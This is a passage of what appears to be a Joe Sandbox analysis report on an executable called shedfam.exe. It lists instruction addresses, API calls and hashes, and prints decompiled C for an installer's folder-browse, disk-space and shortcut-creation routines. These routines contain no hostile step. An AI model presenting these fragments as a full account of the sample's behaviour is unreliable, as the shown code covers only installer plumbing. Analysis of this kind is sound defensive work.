                                                                  0x00404d5e
                                                                  0x00404d65
                                                                  0x00404d68
                                                                  0x00404d68
                                                                  0x00404d6e
                                                                  0x00404d75
                                                                  0x00404d78
                                                                  0x00404d78
                                                                  0x00404d7e
                                                                  0x00404d84
                                                                  0x00404d8a
                                                                  0x00404d8a
                                                                  0x00404d97
                                                                  0x00404ee4
                                                                  0x00404eeb
                                                                  0x00404f08
                                                                  0x00404f0e
                                                                  0x00404f20
                                                                  0x00404f20
                                                                  0x00000000
                                                                  0x00404d9d
                                                                  0x00404d9f
                                                                  0x00404da7
                                                                  0x00404dab
                                                                  0x00404dab
                                                                  0x00404db3
                                                                  0x00404df4
                                                                  0x00404df6
                                                                  0x00404e06
                                                                  0x00404e09
                                                                  0x00404e0e
                                                                  0x00404e15
                                                                  0x00404e18
                                                                  0x00404eba
                                                                  0x00404ec0
                                                                  0x00404ece
                                                                  0x00404edf
                                                                  0x00404edf
                                                                  0x00000000
                                                                  0x00404ece
                                                                  0x00404e1e
                                                                  0x00404e21
                                                                  0x00404e27
                                                                  0x00404e2c
                                                                  0x00404e2e
                                                                  0x00404e30
                                                                  0x00404e36
                                                                  0x00404e3d
                                                                  0x00404e42
                                                                  0x00404e49
                                                                  0x00404e4c
                                                                  0x00404e4c
                                                                  0x00404e53
                                                                  0x00404e5f
                                                                  0x00404e63
                                                                  0x00404e65
                                                                  0x00404e65
                                                                  0x00404e55
                                                                  0x00404e57
                                                                  0x00404e57
                                                                  0x00404e85
                                                                  0x00404e91
                                                                  0x00404ea0
                                                                  0x00404ea0
                                                                  0x00404ea2
                                                                  0x00404ea5
                                                                  0x00404eae
                                                                  0x00000000
                                                                  0x00404db5
                                                                  0x00404dc0
                                                                  0x00404dc3
                                                                  0x00404dc8
                                                                  0x00404dca
                                                                  0x00404dce
                                                                  0x00404dde
                                                                  0x00404de8
                                                                  0x00404dea
                                                                  0x00404ded
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404dd0
                                                                  0x00404dd0
                                                                  0x00404dd6
                                                                  0x00404dd8
                                                                  0x00404dd8
                                                                  0x00404dd9
                                                                  0x00404dda
                                                                  0x00000000
                                                                  0x00404dd0
                                                                  0x00404db3
                                                                  0x00404d97
                                                                  0x00404cd4
                                                                  0x00000000
                                                                  0x00404cea
                                                                  0x00404cf4
                                                                  0x00404cf9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404d0b
                                                                  0x00404d10
                                                                  0x00404d1c
                                                                  0x00404d1c
                                                                  0x00404d1e
                                                                  0x00404d2d
                                                                  0x00404d2f
                                                                  0x00404d36
                                                                  0x00404d39
                                                                  0x00000000
                                                                  0x00404d39
                                                                  0x00404cd4
                                                                  0x0040498a
                                                                  0x0040498f
                                                                  0x00404999
                                                                  0x0040499a
                                                                  0x004049a3
                                                                  0x004049ae
                                                                  0x004049b9
                                                                  0x004049bf
                                                                  0x004049cd
                                                                  0x004049e2
                                                                  0x004049e7
                                                                  0x004049f2
                                                                  0x004049fb
                                                                  0x00404a10
                                                                  0x00404a21
                                                                  0x00404a2e
                                                                  0x00404a2e
                                                                  0x00404a33
                                                                  0x00404a39
                                                                  0x00404a3b
                                                                  0x00404a3e
                                                                  0x00404a43
                                                                  0x00404a48
                                                                  0x00404a4a
                                                                  0x00404a4a
                                                                  0x00404a6a
                                                                  0x00404a6a
                                                                  0x00404a6c
                                                                  0x00404a6d
                                                                  0x00404a72
                                                                  0x00404a75
                                                                  0x00404a78
                                                                  0x00404a7c
                                                                  0x00404a81
                                                                  0x00404a86
                                                                  0x00404a8a
                                                                  0x00404a8f
                                                                  0x00404a94
                                                                  0x00404a96
                                                                  0x00404a9e
                                                                  0x00404b68
                                                                  0x00404b7b
                                                                  0x00000000
                                                                  0x00404aa4
                                                                  0x00404aa7
                                                                  0x00404aaa
                                                                  0x00404aad
                                                                  0x00404aad
                                                                  0x00404ab3
                                                                  0x00404ab9
                                                                  0x00404abc
                                                                  0x00404ac2
                                                                  0x00404ac3
                                                                  0x00404ac8
                                                                  0x00404ad1
                                                                  0x00404ad8
                                                                  0x00404adb
                                                                  0x00404ade
                                                                  0x00404ae1
                                                                  0x00404b1d
                                                                  0x00404b46
                                                                  0x00404b1f
                                                                  0x00404b2c
                                                                  0x00404b2c
                                                                  0x00404ae3
                                                                  0x00404ae6
                                                                  0x00404af5
                                                                  0x00404aff
                                                                  0x00404b07
                                                                  0x00404b0e
                                                                  0x00404b16
                                                                  0x00404b16
                                                                  0x00404ae1
                                                                  0x00404b4c
                                                                  0x00404b4d
                                                                  0x00404b59
                                                                  0x00404b59
                                                                  0x00404b66
                                                                  0x00404b81
                                                                  0x00404b85
                                                                  0x00404ba2
                                                                  0x00404ba7
                                                                  0x00404baa
                                                                  0x00000000
                                                                  0x00404b87
                                                                  0x00404b8c
                                                                  0x00404b95
                                                                  0x00404f22
                                                                  0x00404f34
                                                                  0x00404f34
                                                                  0x00404b85
                                                                  0x00000000
                                                                  0x00404b66
                                                                  0x00404a9e

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                  • String ID: $M$N
                                                                  • API String ID: 1638840714-813528018
                                                                  • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                                  • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                                                                  • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                                  • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                  				signed int _v8;
                                                                  				signed int _v12;
                                                                  				long _v16;
                                                                  				long _v20;
                                                                  				long _v24;
                                                                  				char _v28;
                                                                  				intOrPtr _v32;
                                                                  				long _v36;
                                                                  				char _v40;
                                                                  				unsigned int _v44;
                                                                  				signed int _v48;
                                                                  				CHAR* _v56;
                                                                  				intOrPtr _v60;
                                                                  				intOrPtr _v64;
                                                                  				intOrPtr _v68;
                                                                  				CHAR* _v72;
                                                                  				void _v76;
                                                                  				struct HWND__* _v80;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t82;
                                                                  				long _t87;
                                                                  				signed char* _t89;
                                                                  				void* _t95;
                                                                  				signed int _t96;
                                                                  				int _t109;
                                                                  				signed short _t114;
                                                                  				signed int _t118;
                                                                  				struct HWND__** _t122;
                                                                  				intOrPtr* _t138;
                                                                  				CHAR* _t146;
                                                                  				unsigned int _t150;
                                                                  				signed int _t152;
                                                                  				unsigned int _t156;
                                                                  				signed int _t158;
                                                                  				signed int* _t159;
                                                                  				struct HWND__* _t165;
                                                                  				struct HWND__* _t166;
                                                                  				int _t168;
                                                                  				unsigned int _t197;
                                                                  
                                                                  				_t156 = __edx;
                                                                  				_t82 =  *0x41fd50;
                                                                  				_v32 = _t82;
                                                                  				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
                                                                  				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                  				if(_a8 == 0x40b) {
                                                                  					E004055A0(0x3fb, _t146);
                                                                  					E00405F5D(_t146);
                                                                  				}
                                                                  				_t166 = _a4;
                                                                  				if(_a8 != 0x110) {
                                                                  					L8:
                                                                  					if(_a8 != 0x111) {
                                                                  						L20:
                                                                  						if(_a8 == 0x40f) {
                                                                  							L22:
                                                                  							_v8 = _v8 & 0x00000000;
                                                                  							_v12 = _v12 & 0x00000000;
                                                                  							E004055A0(0x3fb, _t146);
                                                                  							if(E004058CF(_t185, _t146) == 0) {
                                                                  								_v8 = 1;
                                                                  							}
                                                                  							E00405CFB(0x41f548, _t146);
                                                                  							_t87 = E00406087(1);
                                                                  							_v16 = _t87;
                                                                  							if(_t87 == 0) {
                                                                  								L30:
                                                                  								E00405CFB(0x41f548, _t146);
                                                                  								_t89 = E00405882(0x41f548);
                                                                  								_t158 = 0;
                                                                  								if(_t89 != 0) {
                                                                  									 *_t89 =  *_t89 & 0x00000000;
                                                                  								}
                                                                  								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                  									goto L35;
                                                                  								} else {
                                                                  									_t168 = 0x400;
                                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                  									asm("cdq");
                                                                  									_v48 = _t109;
                                                                  									_v44 = _t156;
                                                                  									_v12 = 1;
                                                                  									goto L36;
                                                                  								}
                                                                  							} else {
                                                                  								_t159 = 0;
                                                                  								if(0 == 0x41f548) {
                                                                  									goto L30;
                                                                  								} else {
                                                                  									goto L26;
                                                                  								}
                                                                  								while(1) {
                                                                  									L26:
                                                                  									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
                                                                  									if(_t114 != 0) {
                                                                  										break;
                                                                  									}
                                                                  									if(_t159 != 0) {
                                                                  										 *_t159 =  *_t159 & _t114;
                                                                  									}
                                                                  									_t159 = E00405835(0x41f548) - 1;
                                                                  									 *_t159 = 0x5c;
                                                                  									if(_t159 != 0x41f548) {
                                                                  										continue;
                                                                  									} else {
                                                                  										goto L30;
                                                                  									}
                                                                  								}
                                                                  								_t150 = _v44;
                                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                  								_v44 = _t150 >> 0xa;
                                                                  								_v12 = 1;
                                                                  								_t158 = 0;
                                                                  								__eflags = 0;
                                                                  								L35:
                                                                  								_t168 = 0x400;
                                                                  								L36:
                                                                  								_t95 = E00404889(5);
                                                                  								if(_v12 != _t158) {
                                                                  									_t197 = _v44;
                                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                  										_v8 = 2;
                                                                  									}
                                                                  								}
                                                                  								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
                                                                  									E00404871(0x3ff, 0xfffffffb, _t95);
                                                                  									if(_v12 == _t158) {
                                                                  										SetDlgItemTextA(_a4, _t168, 0x41f538);
                                                                  									} else {
                                                                  										E004047AC(_t168, 0xfffffffc, _v48, _v44);
                                                                  									}
                                                                  								}
                                                                  								_t96 = _v8;
                                                                  								 *0x424024 = _t96;
                                                                  								if(_t96 == _t158) {
                                                                  									_v8 = E0040140B(7);
                                                                  								}
                                                                  								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                  									_v8 = _t158;
                                                                  								}
                                                                  								E00403FD9(0 | _v8 == _t158);
                                                                  								if(_v8 == _t158 &&  *0x42056c == _t158) {
                                                                  									E0040438A();
                                                                  								}
                                                                  								 *0x42056c = _t158;
                                                                  								goto L53;
                                                                  							}
                                                                  						}
                                                                  						_t185 = _a8 - 0x405;
                                                                  						if(_a8 != 0x405) {
                                                                  							goto L53;
                                                                  						}
                                                                  						goto L22;
                                                                  					}
                                                                  					_t118 = _a12 & 0x0000ffff;
                                                                  					if(_t118 != 0x3fb) {
                                                                  						L12:
                                                                  						if(_t118 == 0x3e9) {
                                                                  							_t152 = 7;
                                                                  							memset( &_v76, 0, _t152 << 2);
                                                                  							_v80 = _t166;
                                                                  							_v72 = 0x420580;
                                                                  							_v60 = E00404746;
                                                                  							_v56 = _t146;
                                                                  							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
                                                                  							_t122 =  &_v80;
                                                                  							_v64 = 0x41;
                                                                  							__imp__SHBrowseForFolderA(_t122);
                                                                  							if(_t122 == 0) {
                                                                  								_a8 = 0x40f;
                                                                  							} else {
                                                                  								__imp__CoTaskMemFree(_t122);
                                                                  								E004057EE(_t146);
                                                                  								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
                                                                  								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                  									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
                                                                  									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
                                                                  										lstrcatA(_t146, 0x422f20);
                                                                  									}
                                                                  								}
                                                                  								 *0x42056c =  *0x42056c + 1;
                                                                  								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                  							}
                                                                  						}
                                                                  						goto L20;
                                                                  					}
                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                  						goto L53;
                                                                  					}
                                                                  					_a8 = 0x40f;
                                                                  					goto L12;
                                                                  				} else {
                                                                  					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                  					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
                                                                  						E004057EE(_t146);
                                                                  					}
                                                                  					 *0x423758 = _t166;
                                                                  					SetWindowTextA(_t165, _t146);
                                                                  					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                  					_push(1);
                                                                  					E00403FB7(_t166);
                                                                  					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                  					_push(0x14);
                                                                  					E00403FB7(_t166);
                                                                  					E00403FEC(_t165);
                                                                  					_t138 = E00406087(0xa);
                                                                  					if(_t138 == 0) {
                                                                  						L53:
                                                                  						return E0040401E(_a8, _a12, _a16);
                                                                  					} else {
                                                                  						 *_t138(_t165, 1);
                                                                  						goto L8;
                                                                  					}
                                                                  				}
                                                                  			}












































                                                                  0x004043f5
                                                                  0x004043fb
                                                                  0x00404401
                                                                  0x0040440e
                                                                  0x0040441c
                                                                  0x0040441f
                                                                  0x00404427
                                                                  0x0040442d
                                                                  0x0040442d
                                                                  0x00404439
                                                                  0x0040443c
                                                                  0x004044aa
                                                                  0x004044b1
                                                                  0x00404588
                                                                  0x0040458f
                                                                  0x0040459e
                                                                  0x0040459e
                                                                  0x004045a2
                                                                  0x004045ac
                                                                  0x004045b9
                                                                  0x004045bb
                                                                  0x004045bb
                                                                  0x004045c9
                                                                  0x004045d0
                                                                  0x004045d7
                                                                  0x004045da
                                                                  0x00404611
                                                                  0x00404613
                                                                  0x00404619
                                                                  0x0040461e
                                                                  0x00404622
                                                                  0x00404624
                                                                  0x00404624
                                                                  0x00404640
                                                                  0x00000000
                                                                  0x00404642
                                                                  0x00404645
                                                                  0x00404653
                                                                  0x00404659
                                                                  0x0040465a
                                                                  0x0040465d
                                                                  0x00404660
                                                                  0x00000000
                                                                  0x00404660
                                                                  0x004045dc
                                                                  0x004045de
                                                                  0x004045e2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004045e4
                                                                  0x004045e4
                                                                  0x004045f1
                                                                  0x004045f6
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004045fa
                                                                  0x004045fc
                                                                  0x004045fc
                                                                  0x00404607
                                                                  0x0040460a
                                                                  0x0040460f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040460f
                                                                  0x0040466c
                                                                  0x00404676
                                                                  0x00404679
                                                                  0x0040467c
                                                                  0x00404683
                                                                  0x00404683
                                                                  0x00404685
                                                                  0x00404685
                                                                  0x0040468a
                                                                  0x0040468c
                                                                  0x00404694
                                                                  0x0040469b
                                                                  0x0040469d
                                                                  0x004046a8
                                                                  0x004046a8
                                                                  0x0040469d
                                                                  0x004046b8
                                                                  0x004046c2
                                                                  0x004046ca
                                                                  0x004046e5
                                                                  0x004046cc
                                                                  0x004046d5
                                                                  0x004046d5
                                                                  0x004046ca
                                                                  0x004046ea
                                                                  0x004046ef
                                                                  0x004046f4
                                                                  0x004046fd
                                                                  0x004046fd
                                                                  0x00404706
                                                                  0x00404708
                                                                  0x00404708
                                                                  0x00404714
                                                                  0x0040471c
                                                                  0x00404726
                                                                  0x00404726
                                                                  0x0040472b
                                                                  0x00000000
                                                                  0x0040472b
                                                                  0x004045da
                                                                  0x00404591
                                                                  0x00404598
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00404598
                                                                  0x004044b7
                                                                  0x004044c0
                                                                  0x004044da
                                                                  0x004044df
                                                                  0x004044e9
                                                                  0x004044f0
                                                                  0x004044fc
                                                                  0x004044ff
                                                                  0x00404502
                                                                  0x00404509
                                                                  0x00404511
                                                                  0x00404514
                                                                  0x00404518
                                                                  0x0040451f
                                                                  0x00404527
                                                                  0x00404581
                                                                  0x00404529
                                                                  0x0040452a
                                                                  0x00404531
                                                                  0x0040453b
                                                                  0x00404543
                                                                  0x00404550
                                                                  0x00404564
                                                                  0x00404568
                                                                  0x00404568
                                                                  0x00404564
                                                                  0x0040456d
                                                                  0x0040457a
                                                                  0x0040457a
                                                                  0x00404527
                                                                  0x00000000
                                                                  0x004044df
                                                                  0x004044cd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004044d3
                                                                  0x00000000
                                                                  0x0040443e
                                                                  0x0040444b
                                                                  0x00404454
                                                                  0x00404461
                                                                  0x00404461
                                                                  0x00404468
                                                                  0x0040446e
                                                                  0x00404477
                                                                  0x0040447a
                                                                  0x0040447d
                                                                  0x00404485
                                                                  0x00404488
                                                                  0x0040448b
                                                                  0x00404491
                                                                  0x00404498
                                                                  0x0040449f
                                                                  0x00404731
                                                                  0x00404743
                                                                  0x004044a5
                                                                  0x004044a8
                                                                  0x00000000
                                                                  0x004044a8
                                                                  0x0040449f

                                                                  APIs
                                                                  • GetDlgItem.USER32 ref: 00404444
                                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                                                                  • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                                                                  • lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
                                                                  • lstrcatA.KERNEL32(?,00422F20), ref: 00404568
                                                                  • SetDlgItemTextA.USER32 ref: 0040457A
                                                                    • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\shedfam.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                                    • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                                  • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                                                                    • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                                    • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                                                                    • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: /B$A$C:\Users\user\AppData\Local\Temp
                                                                  • API String ID: 2624150263-3422370627
                                                                  • Opcode ID: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                                  • Instruction ID: 04579f169ebad34731529ea4dd061e989e150d10634133a65e55446a4c87498a
                                                                  • Opcode Fuzzy Hash: b7fefc9cacae961b95d378fd6a641a09e61e2e8d2cd41ae2b0be1c13a03d1c60
                                                                  • Instruction Fuzzy Hash: A5A17EB1900209ABDB11EFA1CC45AAF77B8EF85355F10843BFA01B62D1D77C9A418F69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 74%
                                                                  			E00402036() {
                                                                  				void* _t44;
                                                                  				intOrPtr* _t48;
                                                                  				intOrPtr* _t50;
                                                                  				intOrPtr* _t52;
                                                                  				intOrPtr* _t54;
                                                                  				signed int _t58;
                                                                  				intOrPtr* _t59;
                                                                  				intOrPtr* _t62;
                                                                  				intOrPtr* _t64;
                                                                  				intOrPtr* _t66;
                                                                  				intOrPtr* _t69;
                                                                  				intOrPtr* _t71;
                                                                  				int _t75;
                                                                  				signed int _t81;
                                                                  				intOrPtr* _t88;
                                                                  				void* _t95;
                                                                  				void* _t96;
                                                                  				void* _t100;
                                                                  
                                                                  				 *(_t100 - 0x30) = E00402A0C(0xfffffff0);
                                                                  				_t96 = E00402A0C(0xffffffdf);
                                                                  				 *((intOrPtr*)(_t100 - 0x34)) = E00402A0C(2);
                                                                  				 *((intOrPtr*)(_t100 - 0xc)) = E00402A0C(0xffffffcd);
                                                                  				 *((intOrPtr*)(_t100 - 0x38)) = E00402A0C(0x45);
                                                                  				if(E0040585B(_t96) == 0) {
                                                                  					E00402A0C(0x21);
                                                                  				}
                                                                  				_t44 = _t100 + 8;
                                                                  				__imp__CoCreateInstance(0x4073ac, _t75, 1, 0x40739c, _t44);
                                                                  				if(_t44 < _t75) {
                                                                  					L13:
                                                                  					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                  					_push(0xfffffff0);
                                                                  				} else {
                                                                  					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                  					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4073bc, _t100 - 8);
                                                                  					if(_t95 >= _t75) {
                                                                  						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                  						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                  						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                  						_t81 =  *(_t100 - 0x18);
                                                                  						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                  						if(_t58 != 0) {
                                                                  							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                  							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                  							_t81 =  *(_t100 - 0x18);
                                                                  						}
                                                                  						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                  						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                                  							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                  							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                                  						}
                                                                  						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                                  						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                  						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                                  						if(_t95 >= _t75) {
                                                                  							_t95 = 0x80004005;
                                                                  							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409448, 0x400) != 0) {
                                                                  								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                  								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409448, 1);
                                                                  							}
                                                                  						}
                                                                  						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                  						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                  					}
                                                                  					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                  					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                  					if(_t95 >= _t75) {
                                                                  						_push(0xfffffff4);
                                                                  					} else {
                                                                  						goto L13;
                                                                  					}
                                                                  				}
                                                                  				E00401423();
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t100 - 4));
                                                                  				return 0;
                                                                  			}





















                                                                  0x0040203f
                                                                  0x00402049
                                                                  0x00402052
                                                                  0x0040205c
                                                                  0x00402065
                                                                  0x0040206f
                                                                  0x00402073
                                                                  0x00402073
                                                                  0x00402078
                                                                  0x00402089
                                                                  0x00402091
                                                                  0x00402171
                                                                  0x00402171
                                                                  0x00402178
                                                                  0x00402097
                                                                  0x00402097
                                                                  0x004020a8
                                                                  0x004020ac
                                                                  0x004020b2
                                                                  0x004020bc
                                                                  0x004020be
                                                                  0x004020c9
                                                                  0x004020cc
                                                                  0x004020d9
                                                                  0x004020db
                                                                  0x004020dd
                                                                  0x004020e4
                                                                  0x004020e7
                                                                  0x004020e7
                                                                  0x004020ea
                                                                  0x004020f4
                                                                  0x004020fc
                                                                  0x00402101
                                                                  0x0040210d
                                                                  0x0040210d
                                                                  0x00402110
                                                                  0x00402119
                                                                  0x0040211c
                                                                  0x00402125
                                                                  0x0040212a
                                                                  0x0040213c
                                                                  0x0040214b
                                                                  0x0040214d
                                                                  0x00402159
                                                                  0x00402159
                                                                  0x0040214b
                                                                  0x0040215b
                                                                  0x00402161
                                                                  0x00402161
                                                                  0x00402164
                                                                  0x0040216a
                                                                  0x0040216f
                                                                  0x00402184
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040216f
                                                                  0x0040217a
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • CoCreateInstance.OLE32(004073AC,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409448,00000400,?,00000001,0040739C,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                  • String ID: C:\Users\user\AppData\Local\Temp
